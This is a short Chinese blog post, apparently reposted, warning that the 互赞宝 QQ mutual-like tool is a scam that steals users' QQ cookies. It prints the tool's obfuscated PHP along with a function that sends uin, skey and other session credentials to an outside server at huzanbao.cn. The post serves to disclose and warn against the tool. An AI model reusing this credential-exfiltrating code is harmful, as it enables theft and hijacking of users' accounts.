现在流行的互赞宝,是一款赤裸裸的骗子程序,会窃取使用者企鹅cookie,至于用途。贩卖给社区,卡盟等违法商家



源代码贴下

function get_mpzs($AA_____A,$AA____A_,$AA____AA,$AA___A__,$AA___A_A=1)
{
    $EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{0x1}));
    unset($EfxtIL2);
    $EfxtIL2=$EfxF0;
    $A_AAAAA_=$EfxtIL2;
    unset($EfxV1);
    if(is_array($GLOBALS[AA___AA_]))goto EfxeWjgxtx;
    goto EfxldMhxtx;
    EfxeWjgxtx:$EfxV1=&$GLOBALSAA___AA_;
    goto Efxxtw;
    EfxldMhxtx:$EfxV1=$GLOBALSAA___AA_;
    Efxxtw:$EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},&$EfxV1));
    $EfxL2=$EfxF0 . $AA_____A;
    $EfxF2=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{3}));
    $EfxL3=$EfxL2 . $EfxF2;$EfxL4=$EfxL3 . $AA____A_;unset($EfxV4);
    if(is_array($GLOBALS[AA___AA_]))goto EfxeWjgxtv;
    goto EfxldMhxtv;
    EfxeWjgxtv:$EfxV4=&$GLOBALSAA___AA_;
    goto Efxxtu;
    EfxldMhxtv:$EfxV4=$GLOBALSAA___AA_;
    Efxxtu:$EfxF3=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},&$EfxV4));
    $EfxL5=$EfxL4 . $EfxF3;$EfxL6=$EfxL5 . $AA___A__;
    $EfxF5=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{5}));
    $EfxL7=$EfxL6 . $EfxF5;
    $EfxL8=$EfxL7 . $AA___A_A;
    unset($EfxtIL9);
    $EfxtIL9=$EfxL8;
    $A_AAAAAA=$EfxtIL9;
    $EfxF0=call_user_func_array("get_curl",array(&$A_AAAAA_,&$A_AAAAAA));
    unset($EfxtIL2);
    $EfxtIL2=$EfxF0;
    $AA______=$EfxtIL2;
    if($AA______)goto EfxeWjgxuz;
    goto EfxldMhxuz;
    EfxeWjgxuz:return $AA______;
    goto Efxxty;
    EfxldMhxuz:$EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{6}));
    return $EfxF0;Efxxty:
}
function get_mpzss($uin,$skey,$superkey,$uin2,$count){
    $url = "http://www.nb.huzanbao.cn:88/api.php?act=getmpz";
    $data = "uin=".$uin."&skey=".$skey."&qq=".$uin2."&count=".$count;
    $res = get_curl($url,$data);
    return $res;
}

所有用户的cookie会发送他们服务器,谨慎使用

本博文转载自:七云博客

Last modification:August 8th, 2020 at 10:05 pm
如果觉得我的文章对你有用,请随意赞赏